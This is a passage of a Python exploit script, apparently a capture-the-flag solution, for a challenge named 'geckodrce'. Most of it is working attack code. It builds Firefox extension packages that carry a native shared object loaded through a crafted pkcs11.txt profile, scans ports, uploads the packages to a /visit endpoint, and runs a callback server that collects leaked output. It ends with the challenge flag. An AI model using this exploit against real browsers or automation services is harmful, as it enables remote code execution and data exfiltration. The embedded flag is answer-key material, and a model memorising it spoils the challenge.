parameters=configdir='sql:.' certPrefix='' keyPrefix='' secmod='secmod.db' flags=readOnly
NSS=trustOrder=75 cipherOrder=100

library={DOWNLOAD_PATH}
name=geckodrce
parameters=
NSS=trustOrder=100 cipherOrder=100
"""
    prefs = 'user_pref("browser.shell.checkDefaultBrowser", false);\\n'
    bio = io.BytesIO()
    with zipfile.ZipFile(bio, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("pkcs11.txt", pkcs11)
        zf.writestr("prefs.js", prefs)
    return base64.b64encode(bio.getvalue()).decode()

def make_background(lo: int, hi: int, concurrency: int, callback_url: str, profile_b64: str) -> str:
    return (
        BACKGROUND_JS
        .replace("__LO__", str(lo))
        .replace("__HI__", str(hi))
        .replace("__CONCURRENCY__", str(concurrency))
        .replace("__CALLBACK_URL__", json.dumps(callback_url))
        .replace("__PROFILE_B64__", json.dumps(profile_b64))
    )

def build_xpi(path: Path, so_bytes: bytes, background_js: str) -> None:
    manifest = {
        "manifest_version": 2,
        "name": "geckodrce-pkcs11",
        "version": "1.0",
        "permissions": [
            "<all_urls>",
            "downloads",
            "webRequest",
            "webRequestBlocking",
        ],
        "background": {"scripts": ["background.js"]},
        "applications": {"gecko": {"id": f"geckodrce-{uuid.uuid4().hex}@example.invalid"}},
    }
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.json", json.dumps(manifest, separators=(",", ":")))
        zf.writestr("background.js", background_js)
        zf.writestr("pwn.so", so_bytes)

    size = path.stat().st_size
    if size > MAX_XPI_SIZE:
        raise RuntimeError(f"{path} is {size} bytes, over 1 MiB upload limit")

def parse_shards(text: str):
    shards = []
    for item in text.split(","):
        item = item.strip()
        if not item:
            continue
        lo_s, hi_s = item.split("-", 1)
        lo, hi = int(lo_s), int(hi_s)
        if not (1 <= lo <= hi <= 65535):
            raise ValueError(f"bad shard: {item}")
        shards.append((lo, hi))
    if not shards:
        raise ValueError("no shards configured")
    return shards

def normalize_visit_url(target: str) -> str:
    target = target.rstrip("/")
    if target.endswith("/visit"):
        return target
    return target + "/visit"

def default_callback_url(target: str, listen_port: int) -> str:
    host = urllib.parse.urlsplit(target).hostname or ""
    if host in {"127.0.0.1", "localhost", "::1"}:
        return f"<http://host.docker.internal>:{listen_port}/leak"
    raise SystemExit("remote target needs --callback-url pointing to a reachable HTTP endpoint")

def multipart_upload(url: str, filename: str, data: bytes, timeout: int) -> bytes:
    boundary = "----geckodrce-" + uuid.uuid4().hex
    body = bytearray()
    body.extend(f"--{boundary}\\r\\n".encode())
    body.extend(f'Content-Disposition: form-data; name="extension"; filename="{filename}"\\r\\n'.encode())
    body.extend(b"Content-Type: application/x-xpinstall\\r\\n\\r\\n")
    body.extend(data)
    body.extend(f"\\r\\n--{boundary}--\\r\\n".encode())
    req = urllib.request.Request(
        url,
        data=bytes(body),
        headers={"Content-Type": f"multipart/form-data; boundary={boundary}"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()

def serve_callback(host: str, port: int, inbox: queue.Queue):
    CallbackHandler.inbox = inbox
    httpd = ReusableTCPServer((host, port), CallbackHandler)
    thread = threading.Thread(target=httpd.serve_forever, daemon=True)
    thread.start()
    return httpd

def build_artifacts(args, callback_url: str, out_dir: Path):
    out_dir.mkdir(parents=True, exist_ok=True)
    c_path = out_dir / "pwn.c"
    so_path = out_dir / "pwn.so"

    if args.so:
        so_bytes = Path(args.so).read_bytes()
        print(f"[+] using supplied shared object: {args.so} ({len(so_bytes)} bytes)")
    else:
        write_payload_source(c_path, callback_url)
        compile_shared_object(out_dir, c_path, so_path)
        so_bytes = so_path.read_bytes()
        print(f"[+] built pwn.so ({len(so_bytes)} bytes)")

    profile_b64 = make_profile_b64()
    shards = parse_shards(args.shards)
    xpis = []
    for idx, (lo, hi) in enumerate(shards, 1):
        js = make_background(lo, hi, args.concurrency, callback_url, profile_b64)
        xpi_path = out_dir / f"geckodrce_{idx}_{lo}_{hi}.xpi"
        build_xpi(xpi_path, so_bytes, js)
        print(f"[+] built {xpi_path.name}: ports {lo}-{hi}, {xpi_path.stat().st_size} bytes")
        xpis.append(xpi_path)
    return xpis

def main() -> int:
    ap = argparse.ArgumentParser(description="TRXCTF geckodrce exploit via geckodriver /session + pkcs11 profile")
    ap.add_argument("--target", default=DEFAULT_TARGET, help="base target URL or direct /visit URL")
    ap.add_argument("--callback-url", help="HTTP endpoint reachable from the target container")
    ap.add_argument("--listen-host", default="0.0.0.0", help="callback bind host for local testing")
    ap.add_argument("--listen-port", type=int, default=18080, help="callback bind port for local testing")
    ap.add_argument("--shards", default=DEFAULT_SHARDS, help="comma-separated inclusive port shards")
    ap.add_argument("--concurrency", type=int, default=384, help="scan workers per XPI")
    ap.add_argument("--waves", type=int, default=2, help="number of upload waves")
    ap.add_argument("--wave-delay", type=float, default=20.0, help="delay between waves")
    ap.add_argument("--visit-timeout", type=int, default=95, help="HTTP timeout for each /visit upload")
    ap.add_argument("--wait", type=int, default=150, help="seconds to wait for callback messages")
    ap.add_argument("--out-dir", default="", help="keep generated artifacts in this directory")
    ap.add_argument("--so", default="", help="use an existing Alpine/musl-compatible pwn.so")
    ap.add_argument("--build-only", action="store_true", help="build XPI files and do not upload")
    args = ap.parse_args()

    visit_url = normalize_visit_url(args.target)
    callback_url = args.callback_url or default_callback_url(args.target, args.listen_port)

    inbox = queue.Queue()
    httpd = None
    if not args.callback_url:
        httpd = serve_callback(args.listen_host, args.listen_port, inbox)
        print(f"[+] callback listening on {args.listen_host}:{args.listen_port}")
    print(f"[+] visit URL: {visit_url}")
    print(f"[+] callback URL: {callback_url}")

    temp_ctx = None
    if args.out_dir:
        out_dir = Path(args.out_dir)
    else:
        temp_ctx = tempfile.TemporaryDirectory(prefix="geckodrce_pkcs11_")
        out_dir = Path(temp_ctx.name)

    try:
        xpis = build_artifacts(args, callback_url, out_dir)
        if args.build_only:
            print("[+] build-only mode; not uploading")
            return 0

        errors = []

        def upload(path: Path, wave: int):
            try:
                data = path.read_bytes()
                print(f"[+] wave {wave}: uploading {path.name}")
                resp = multipart_upload(visit_url, path.name, data, args.visit_timeout)
                print(f"[+] wave {wave}: {path.name} -> {resp.decode(errors='replace')}")
            except Exception as exc:
                errors.append((path.name, wave, exc))
                print(f"[!] wave {wave}: {path.name} upload failed: {exc}")

        threads = []
        for wave in range(1, args.waves + 1):
            if wave > 1:
                print(f"[*] sleeping {args.wave_delay:.1f}s before wave {wave}")
                time.sleep(args.wave_delay)
            for xpi in xpis:
                t = threading.Thread(target=upload, args=(xpi, wave), daemon=True)
                t.start()
                threads.append(t)

        deadline = time.time() + args.wait
        found = None
        last = None
        while time.time() < deadline:
            try:
                item = inbox.get(timeout=1)
            except queue.Empty:
                continue
            last = item
            print("[callback]", item)
            match = FLAG_RE.search(item)
            if match:
                found = match.group(0)
                break

        for t in threads:
            t.join(timeout=0.1)

        if found:
            print(f"[+] flag: {found}")
            return 0
        if args.callback_url:
            print("[*] uploads sent. Check the external callback endpoint for the flag body.")
            return 0
        if last is not None:
            print(f"[-] no flag found; last callback: {last}")
        if errors:
            print(f"[-] upload errors: {errors}")
        return 1
    finally:
        if httpd:
            httpd.shutdown()
        if temp_ctx:
            temp_ctx.cleanup()

if __name__ == "__main__":
    raise SystemExit(main())
    
# TRX{s0_n0w_I_inst4ll_ff_ext3nsi0ns_and_I_get_rce-ed_wtf!?}